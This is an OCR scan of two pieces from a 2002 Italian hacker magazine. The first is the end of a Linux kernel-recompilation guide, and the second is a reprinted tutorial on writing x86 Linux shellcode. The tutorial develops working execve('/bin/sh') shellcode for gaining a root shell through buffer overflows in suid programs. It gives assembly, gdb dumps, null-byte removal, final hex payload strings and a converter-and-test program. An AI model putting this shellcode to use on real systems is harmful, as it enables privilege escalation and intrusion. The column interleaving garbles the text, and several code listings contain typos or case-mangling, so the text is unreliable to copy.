libc.so.9 -> libc.so.9.8.7 stiamo particolare attenzione a y, dato che
libc.so.9.8.7 se il suo valore è un numero pari la versione # make config
libc.so.10 -> libc.so.10.1.1 del kernel è abbastanza stabile, mentre un ;questa è l'operazione più importante, in cui
libc.so.10.1.1 numero dispari sta a significare che è una definiamo le caratteristiche e i componenti
versione in fase di sviluppo. del nuovo Kernel. Se usiamo un Kernel ab-
I sorgenti devono trovarsi nella cartella bastanza recente, possiamo usare:
>> Ricompilare il KERNEL "/usr/src/linux/". Se si usa un'altra posizione,
bisogna fare un collegamento simbolico per # make menuconfig
Il Kernel è la base del sistema opera- raggiungere i sorgenti. Dobbiamo anche ;sistema di configurazione a menu testuale.
tivo. I programmi utilizzano funzioni fornite verificare che i collegamenti simbolici conte-
dal kernel, e così non devono agire diretta- nuti in "/usr/include/" siano corretti. # make xconfig
mente con la CPU. ;sistema di configurazione con sistema gra-
Il Kernel Linux è costituito normalmente di . "asm" -> "/usr/src/linux/include/ fico X.
un solo file, che può essere "vmlinuz" o "zI- asm-1386/"
mage", "bzImage" e altri ancora, ma ouò . "linux" -> "/usr/src/linux/include/ Se è la prima volta che ricompilate il Kernel
comprendere anche moduli aggiuntivi per linux/" vi consiglio di scegliere l'ultima opzione, da-
la gestione di componenti hardware specifi- . "scsi" -> "/usr/src/linux/include/ to che è un pò più semplice per chi è alle pri-
ci, che devono poter essere attivati e disatti- scsi" me armi con il sistema operativo.
vati durante l'utilizzo del sistema.
Quando parliamo di Kernel che ha tutte le Naturalmente "asm" varia a seconda della Ora possiamo passare alla compilazione
funzionalità incluse in un solo file, parliamo piattaforma utilizzata. vera e propria attraverso questo comando:
di Kernel monolitico, mentre quando parte Una volta posizionati i sorgen-
delle funzioni sono dentro moduli esterni, si ti, possiamo passare # make dep ; make clean ; make bzImage
dice Kernel modulare. Il Kernel monoliti- alla configura- ;attenzione alla I maiuscola.
co ha il vantaggio di avere tutto in un zione
file, ma è rigido e non permette di liberare Al termine della compilazione, sempre se è
risorse quando le periferiche gestite non andata a buon fine, troveremo il nostro Ker-
servono più. Il Kernel modula- nel nella cartella "/usr/src/linux/i386/boot/"
re ha il vantaggio di po- col nome di "bzImage". Attenzione: se
ter disattivare i moduli a create un Kernel troppo grande, po-
piacimento, in particolare trebbe non rientrare nella dimen-
quelli che gestiscono in modo zione massima del file, e quindi il
diverso le processo di compilazione non si com-
stesse peiferiche. Tuttavia, essen- pleterà.
do strutturato in più file, può cau- Una volta relizzato il Kernel, provia-
sare errori. mo a vedere se funziona; bisogna
Di solito l'uso dei Kernel modu- spostarlo nella directory "/boot/"
lari dovrebbe essere riservato l dandogli come nome "vmlinuz",
a utenti che hanno già una buo- i de
io n e ma prima è meglio fare una pro-
na esperienza nella gestione dei vers quell va creando un floppy che carica
le a
Kernel monolitici, quindi per il momento tu tte solete e. il nuovo Kernel anzichè quello
non tratteremo questo argomento. Le ovano ai ob tazion precedente. Scriviamo quindi:
distribuzioni forniscono un kernel che si s i tr le orm rimen
.org uel spe
adatti più o meno a tutte le esigenze. Per ot- e rnel , da q po e # cp /usr/src/linux/arch/i386/boot/
tenere le massime prestazioni, per esempio w w.k Linux svilup bzImage /dev/fd0
w i
per sfruttare il più possibile le istruzioni spe- Su nel di fase d dell'installazio-
cifiche del proprio microprocessore, è me- Ker ora in ne. Leggiamo il file e riavviamo il nostro sistema operativo. Se il
glio costruirsi un kernel ad hoc, ritagliato su anc readme e procediamo così: kernel si carica senza problemi, si può co-
misura per il proprio sistema. piare il kernel nella directory /boot/, togliere
Per servono gli strumenti di sviluppo, cioè il # cd /usr/src/linux il floppy e riavviare il computer. K
compilatore e i sorgenti del kernel. I sorgen- ;directory dove sono i sorgenti del Kernel Lucifero88

www.hackerjournal.it |27
28_31_hj08_shell 4-09-2002 11:12 Pagina 28

dossier

INTRODUZIONE ALLO SHELL CODING

Ghost in the Shell

Alla base di tantissimi exploit che minano la sicurezza di un


sistema ci sono problemi di buffer overflow, che possono per -
mettere a un malintenzionato di guadagnare accesso alla linea
di comando con privilegi da utente root. Vediamo come...

Lo shellcode non è altro che codice macchina, solitamente inserito


Questo articolo è apparso per la prima volta tramite un exploit (buffer overflow). Si tratta di codice immesso
sull n. 6 della ezine OndaQuadra Magazine arbitrariamente dall'attacker con lo scopo di ottenere un
(www.ondaquadra.org), e viene qui accesso da remoto, o per elevare i propri privilegi all'in-
ripubblicato per gentile concessione. terno di un sistema (per esempio, diventare root anche se si è un
utente normale). Come dicevamo, si tratta di codice macchina,
quindi inevitabilmente legato ad un'architettura. Uno shellcode

I
l fine di questo articolo è quello di aiutare a compren- per x86 non funzionerà mai su un'architettura sparc o ppc;
dere i meccanismi che si nascondono dietro gli shellco- e naturalmente uno per Linux non funzionerà su Windows.
de e stimolare il lettore ad approfondire il tema, aiu- In questa sede si parlerà di shellcode x86 su piattaforma Linux; il let-
tandolo a raggiungere l'abilità di scrivere shellcode au- tore deve essere in grado di compilare programmi con gcc e deve
tonomamente. Spero sia utile a chi sia avvicina al conoscere (anche in modo superficiale) gdb. Realizzeremo uno
la sicurezza; a chi ha un sistema da "difendere" shellcode classico: l'esecuzione di sh come root partendo dai privi-
e vuole capire le tecniche di attacco dei crackers. legi di utente.
Per comprendere a fondo i contenuti qui presentati, è necessaria
una conoscenza anche superficiale di assembler x86, architettura di >> Rootshell
sistema, un po' di linguaggio C, grande entusiasmo e motivazione
(che poi vorrebbe dire notti insonni a provare e riprovare).
Non ci soffermeremo sul buffer overflow. Esistono testi in italiano che
hanno parlato del buffer overflow (vedere i vecchi numeri di BFi, Prima di fare una cosa è necessario avere ben presente che cosa si
www.s0ftpj.org/bfi); chi conosce l'inglese può trovare nella bi- vuole fare. Lo shellcode inizia dove il buffer overflow finisce: siamo
bliografia i riferimenti necessari. Vogliamo solo ricordare che lo riusciti a iniettare il nostro codice, possiamo fare quello
shellcode viene generalmente inserito nello stack tramite funzioni di che vogliamo. Vogliamo ottenere una shell root: come fa-
copia delle stringhe (es. strcpy); questa funzione prevede che la fine re? Molto semplice, utilizziamo la funzione execve per eseguire
della stringa sia identificata dal carattere 0, quindi lo shellcode non /bin/sh. Per prima cosa scriviamo un programmino in C che esegue
può contenrere questo carattere. quanto appena detto:
In questa sede naturalmente si parla dei casi basilari, necessari per
spiegare i concetti. Non si parla di heap, overflow da un byte, di void main(){
shellcode polimorfiche e nemmeno di contromisure contro gli IDS: char *sh[2];
credo sia già abbastanza complicato così per chi deve capire il mec- sh[0]="/bin/sh";
canismo. Ricordo solo che per ottenere una root shell, il cracker de- sh[1]=0;
ve attaccare un programma che giri con i privilegi di root e sia ac- execve(sh[0],sh,0);
cessibile anche da un utente normale (suid). }

28 | www.hackerjournal.it
28_31_hj08_shell 4-09-2002 11:12 Pagina 29

>>
Questo semplice programma esegue /bin/sh e termina. I dettagli (jump) che utilizzeremo fa "saltare" il codice all'indirizzo specificato.
della funzione execve li trovate in man execve. A noi basta sapere Anzi, in realtà in questo caso il parametro fornito sarà un offset, ov-
che necessita di tre parametri: vero un valore che rappresenta la distanza in byte dall'indirizzo di
1. la stringa che contiene il comando da eseguire destinazione.
2. puntatore a un array con i parametri da passare (per noi 0) La "call" è diversa; si tratta infatti di una chiamata ad una subrouti-
3. i parametri di ambiente (per noi nulli). ne. Quando viene eseguita una call, l'indirizzo immediatamente
Compiliamo il programmino con -static e poi lanciamo gdb: successivo alla call stessa viene salvato sullo stack.
gcc shell.c -o shell -static Per esempio, se la call si trova a questo ipotetico indirizzo:
gdb shell 0x804cff0 call vaidaqualcheparte
quindi andiamo a vedere cosa fa la funzione execve: 0x804cff5 ...
(gdb) disas execve sullo stack troveremo l'indirizzo 0x804cff5.
Dump of assembler code for function __execve: Ora tutto dovrebbe essere più chiaro. Mettendo all'inizio della no-
0x804cfdc <__execve>: push %ebp stra shellcode un jmp alla fine della codice, facendolo puntare alla
0x804cfdd <__execve+1>: mov $0x0,%eax
0x804cfe2 <__execve+6>: mov %esp,%ebp Buffer Overflow: un frequente errore nella gestione
0x804cfe4 <__execve+8>: sub $0x10,%esp
0x804cfe7 <__execve+11>: push %edi
0x804cfe8 <__execve+12>: push %ebx
0x804cfe9 <__execve+13>: mov 0x8(%ebp),%edi
? dei dati da parte di un programma. Se lo spazio a disposi-
zione per certi dati (buffer) si esaurisce, il programma po-
trebbe andare incontro ad errori o, come spesso accade,
eseguire direttamente e senza controlli istruzioni immesse
0x804cfec <__execve+16>: test %eax,%eax maliziosamente da un utente qualsiasi..
0x804cfee <__execve+18>: je 0x804cff5 <__execve+25>
0x804cff0 <__execve+20>: call 0x0
0x804cff5 <__execve+25>: mov 0xc(%ebp),%ecx call (che richiamerà l'inizio del codice), provocheremo il salvataggio
0x804cff8 <__execve+28>: mov 0x10(%ebp),%edx dell'indirizzo successivo alla call; se noi dopo la call metteremo la
0x804cffb <__execve+31>: push %ebx nostra stringa, l'indirizzo stesso della stringa si troverà sullo stack e
0x804cffc <__execve+32>: mov %edi,%ebx potrà essere comodamente recuperato con una semplice istruzione
0x804cffe <__execve+34>: mov $0xb,%eax "popl". Ovvero:
0x804d003 <__execve+39>: int $0x80 jmp finecodice; salta a fine codice
inizio: ; label di inizio codice
a noi interessano in particolar modo la linea: popl esi ; preleva eip dallo stack
0x804cfe9 <__execve+13>: mov 0x8(%ebp),%edi ...\
dove il primo parametro della funzione (l'indirizzo della stringa ... shellcode ; corpo dello shellcode
"/bin/sh" viene posto in edi, e le righe: .../
0x804cff5 <__execve+25>: mov 0xc(%ebp),%ecx finecodice: ; label di fine codice
0x804cff8 <__execve+28> mov 0x10(%ebp),%edx call inizio; la call provoca il salvataggio di eip sullo
0x804cffb <__execve+31>: push %ebx stack, ovvero l'indirizzo della nostra stringa
0x804cffc <__execve+32>: mov %edi,%ebx .stringa "/bin/sh" :la stringa da passare a execve
0x804cffe <__execve+34>: mov $0xb,%eax il codice parte, salta a "finecodice:", esegue la call: l'indirizzo della
0x804d003 <__execve+39>: int $0x80 stringa viene salvato sullo stack. La call porta il flusso del program-
dove il secondo parametro (l'indirizzo di sh) viene posto in ecx (mov ma a "inizio:" dove l'istruzione popl recupera l'indirizzo della stringa.
0xc(%ebp),%ecx), il terzo parametro (NULL) in edx
(0x10(%ebp),%edx). Quindi viene chiamata la execve (codice $0xb):
0x804cffe <__execve+34>: mov $0xb,%eax
>> Shell coding
0x804d003 <__execve+39>: int $0x80

Questo è quello che dovrà fare il nostro shellcode: passare i tre Cominciamo ora a dare uno sguardo a come si presenterà il no-
parametri e quindi chiamare execve. stro codice in assembler:
shell1.c
>> L’indirizzo misterioso void main(){
__asm__("jmp fine: \n"
"inizio: popl %esi \n"
"movl %esi,0x8(%esi) \n"
Problema. Noi dovremo inserire il nostro codice sullo stack, e non "movl $0x0,0xc(%esi) \n"
conosceremo a priori gli indirizzi dove il codice stesso si verrà a tro- "movb $0x0,0x7(%esi) \n"
vare. Visto che noi dobbiamo passare dei parametri alla funzione, "movl %esi,%ebx \n"
dobbiamo conoscere almeno l'indirizzo dove poter trovare questi "leal %0x8(%esi),%ecx \n"
parametri. Ci serve quindi un espediente per trovare questo "leal %0xc(%esi),%edx \n"
indirizzo. Semplice: metteremo la stringa alla fine del codice, quin- "movl $0xb,%eax \n"
di utilizzeremo una jmp e una call. Per capire bene cosa stiamo per "int $0x80 \n"
fare occorre rispolverare un po' di assembler. L'istruzione "jmp" "fine: call inizio: \n"

www.hackerjournal.it | 29
28_31_hj08_shell 4-09-2002 11:12 Pagina 30

dossier

INTRODUZIONE ALLO SHELL CODING

" .string \"/bin/sh\" \n"); Ma se dobbiamo utilizzare lo zero, per esempio per azzerare un re-
} gistro? Chi programma in assembler sa che in genere per azzerare
i registri non si usa mov $0x0, %eax; al suo posto si può utilizzare
Viene impostata la label "inizio:" che servirà alla call, quindi dopo la xorl %eax,%eax. L'or-esclusivo (xor) del registro con se stesso da co-
popl %esi, esi stesso conterrà l'indirizzo della stringa. me risultato zero. Quindi, inseriamo la linea xorl %eax,%eax ed
__asm__("inizio: jmp fine: \n" effettuiamo le mov necessarie: movb %al,0x7(%esi) e movl
"popl %esi \n" %eax,0xc(%esi)
dobbiamo sistemare i parametri. Copiamo l'indirizzo della stringa Infine cambiamo un opcode. Al posto di movl $0xb,$eax mettia-
nel secondo parametro mo movb $0xb,%al
"movl %esi,0x8(%esi) \n" La differenza tra i due opcode è che il primo coinvolge tutto il regi-
mettiamo uno zero nel terzo stro eax, mentre il secondo solo la parte bassa di eax, ovvero "al" il
"movl $0x0,0xc(%esi) \n" "registrino" a 8 bit "contenuto" in eax. Mettere il valore "0xb" (ovvero
e mettiamo zero alla fine della stringa, carattere di fine stringa il codice di execve) in "al" prima di chiamare int 80 è il nostro scopo,
"movb $0x0,0x7(%esi) \n" quindi questa soluzione ci andrà benissimo.
quindi passiamo gli indirizzi dei parametri nei registri dove execve si In alternativa a xor, si potrebbe usare l'istruzione sub. Per esempio
aspetta di trovarli... (ebx,ecx,edx) sub eax,eax ottiene l'effetto di azzerare il registro.
"movl %esi,%ebx \n" Ora il nostro shellcode avrà questo aspetto:
"leal %0x8(%esi),%ecx \n"
"leal %0xc(%esi),%edx \n" shell2.c
si esegue la chiamata a execve void main(){
"movl $0xb,%eax \n" __asm__("jmp fine \n"
"int $0x80 \n" "inizio: popl %esi \n"
"fine: call inizio: \n" "movl %esi,0x8(%esi) \n"
" .string \"/bin/sh\" \n"); "xorl %eax,%eax \n"
} "movb %al,0x7(%esi) \n"
e ci troviamo root :) "movl %eax,0xc(%esi) \n"
"movl %esi,%ebx \n"
"leal 0x8(%esi),%ecx \n"
>> (X)ora et (e)labora "leal 0xc(%esi),%edx \n"
"movb $0xb,%al \n"
"int $0x80 \n"
Benché la cosa possa sembrare già abbastanza complicata, i pro- "fine: call inizio \n"
blemi non sono ancora finiti. Infatti, se compiliamo il codice appena ".string \"/bin/sh\" \n");
presentato, troveremo degli zeri all'interno dello shellcode e questo, }
come abbiamo detto all’inizio, non va bene.
Lanciamo gdb shell1 Compiliamolo con gcc shell2.c -o shell2 e lanciamo gdb shell2
Analizzando il nostro codice con xb/x non troveremo zeri ;)
Copyright 2000 Free Software Foundation, Inc.
[...]
(gdb) x/bx main+3 (saltiamo il preambolo) >> La via della mano destra
0x80483b7 <main+3>: 0xe9
0x80483b8 <main+4>: 0x62
[...] In tutti gli exploit noi vediamo lo shellcode in questa forma:
0x80483c3 <main+15>: 0x00 < questa non va bene
0x80483c4 <main+16>: 0x00 char c0de[]= char c0de[]=
0x80483c5 <main+17>: 0x00 "\xeb\x18\x5e\x89\x76\x08\x31\xc0
0x80483c6 <main+18>: 0x0 \x88\x46\x07\x89\x46\x0c\x89\xf3"
0x80483c7 <main+19>: 0xc6 "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xc
0x80483c8 <main+20>: 0x46 d\x80\xe8\xe3\xff\xff\xff\x2f"
0x80483c9 <main+21>: 0x07 "\x62\x69\x6e\x2f\x73\x68";
0x80483ca <main+22>: 0x00 < questa nemmeno
[...] L'ultima nostra fatica sarà quella di convertire il codice macchina in
0x80483d5 <main+33>: 0x00 < e questa neanche stringhe contenenti codice esadecimale da inserire nell'exploit stesso.
[...] Le vie sono due: a manina, oppure usando un programma
0x80483e5 <main+49>: 0x68 Se siamo masochisti useremo la via dei folli, ovvero la Via della Ma-
no Sinistra, la prima.
Le linee evidenziate con “<” non vanno bene e devono essere in Compiliamo il nostro codicillo, entriamo in gdb, scandagliamo il co-
qualche modo cambiate. (Per brevità, sono state omesse alcune li- dice e lo copiamo a mano, ovvero:
nee, in corrispondenza dei segni [...])
Bisogna ottimizzare il codice assembler, eliminando gli zeri. gcc shell2.c -o shell2

30 | www.hackerjournal.it
28_31_hj08_shell 4-09-2002 11:12 Pagina 31

>>
Script di Shellcode produrre il listato assembler e quindi compiliamo il prodotto con
8<---OUTP.C outp.c dei teso:
#INCLUDE <STDIO.H>
/* gcc shell2.c -S
CONVERT .S TO SHELLCODE. TYPO/TESO (TYPO@INFERNO.TUSCU- gcc shell2.s outp.c -o codicillo
LUM.EDU)
$ CAT LALA.S eseguendo il programma così ottenuto (ovvero "codicillo") si otterrà
.GLOBL CBEGIN la shellcode in formato stringa/hex e una funzione per testarla. Così
.GLOBL CEND per interderci:
CBEGIN:
XORL %EAX, %EAX unsigned char shellcode[] =
... "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\xc3\xb0\x17\xcd\
CEND: x80\x31\xc0\x89"
$ GCC -WALL LALA.S OUTP.C -O LALA "\x46\x0c\x88\x46\x07\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\
$ ./LALA xb0\x0b\xcd\x80"
UNSIGNED CHAR SHELLCODE[] = "\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
"\X31\XC0\X31\XDB\X31\XC9\XB3\X0F\XB1\X0F\XB0\X47\XCD\X8 int main() {
0\XEB\X1E\X5B" void (*f)();
"\X31\XC0\X88\X43\X07\X89\X5B\X08\X89\X43\X0C\X8D\X4B\X0 f = (void *) shellcode;
8\X8D\X53\X0C" printf("%d\n", strlen(shellcode));
"\XB0\X0B\XCD\X80\X89\XC3\X31\XC0\XB0\X01\XCD\X80\XE8\XD f();
D\XFF\XFF\XFF" }
"\X2F\X74\X6D\X70\X2F\X74\X73\X74\X65\X73\X6F\X63\X72\X6
5\X77\X21\X21"; Attenzione: il codice dei Teso prevede la presenza di due label "cbe-
... gin:" e "cend:" prima della shellcode e subito dopo; inoltre otterrete
*/ un errore se utilizzerete il nome "main" per la funzione della shellco-
EXTERN VOID CBEGIN(); de: sostituitelo con "cmain" e tutto dovrebbe funzionare.
EXTERN VOID CEND();
INT MAIN() {
CHAR *BUF = (CHAR *) CBEGIN;
>> Conclusione
INT I = 0, X = 0;
PRINTF("UNSIGNED CHAR SHELLCODE[] = \N\"");
FOR (; (*BUF) && (BUF < (CHAR *) CEND); BUF++) { Nessuno si illuda. Una volta acquisiti i concetti qui espressi non si di-
IF (I++ == 17) I = 1; venta automaticamente "hacker". Questo rappresenta il know-how di
IF (I == 1 && X != 0) PRINTF("\"\N\""); base per chi vuole intraprendere la strada della nobile arte hackere-
X = 1; sca. Questi sono argomenti già conosciuti, triti e ritriti, quasi banali
PRINTF("\\X%02X", (UNSIGNED CHAR) *BUF); dal punto di vista dell'hacking. Lo shellcode che abbiamo visto è mol-
} to semplice (ma efficace). In realtà spesso ciò non basta. Po-
PRINTF("\";\N");P tremmo aver bisogno di bindare la shell sul tcp, droppare la roots-
PRINTF("INT MAIN() {VOID (*F)();F = (VOID *) hell in /tmp, aprire una sessione telnet inversa... Il limite è dato
SHELLCODE; PRINTF(\"%%D\\N\", dalla fantasia e dall'abilità. Inoltre bisogna considerare la pre-
STRLEN(SHELLCODE));F();}"); senza di IDS. Esistono tecniche che permettono di "beffarli". Su un
RETURN(0); vecchio numero di phrack è stato presentato un compilatore di shell-
} code che permette di trasformare il codice prodotto utilizzando solo
8<--- caratteri stampabibli. Questo articolo ha cercato di spiegare alcuni
concetti che forse erano ancora oscuri a molti, e ha voluto far intra-
gdb shell2 vedere ad altri la meraviglia dell'arcana programmazione in assem-
(gdb) xb/x main+3 (saltiamo il preambolo) bler. Forse qualcuno abbandonerà i trojan o gli scriptz e
0x80483c3 <main+3>: 0xeb cercherà finalmente di capire che cosa sta facendo... K
0x80483c4 <main+4>: 0x18 Tritemius ~ OQ Staff
0x80483c5 <main+5>: 0x5e
0x80483c6 <main+6>:
...
0x89
Fonti e bibliografia
Smashing The Stack For Fun And Profit", Aleph1
Prendiamo 0xeb e lo copiamo, prendiamo 0x18 e lo copiamo... "Introduction to Buffer Overflow", Ghost_Rider
In alternativa possiamo usare la Via della Mano Destra, la via con- "The Art of Writing Shellcode", smiler
templativa: facciamo un programmino. Anzi, quei santi ragazzi dei
"How to write Buffer Overflows", mudge
Teso hanno già provveduto. Lo scriptino nel riquadro a sinistra,
“Script di shellcode” fa al caso nostro. "outp.c", typo/teso
L'uso è semplicissimo. Compiliamo la nostra shellcode con -S per "Il manuale 80386". (McGrwaHill) llC.H. Pappas,
W.H. Murray III

www.hackerjournal.it | 31

Potrebbero piacerti anche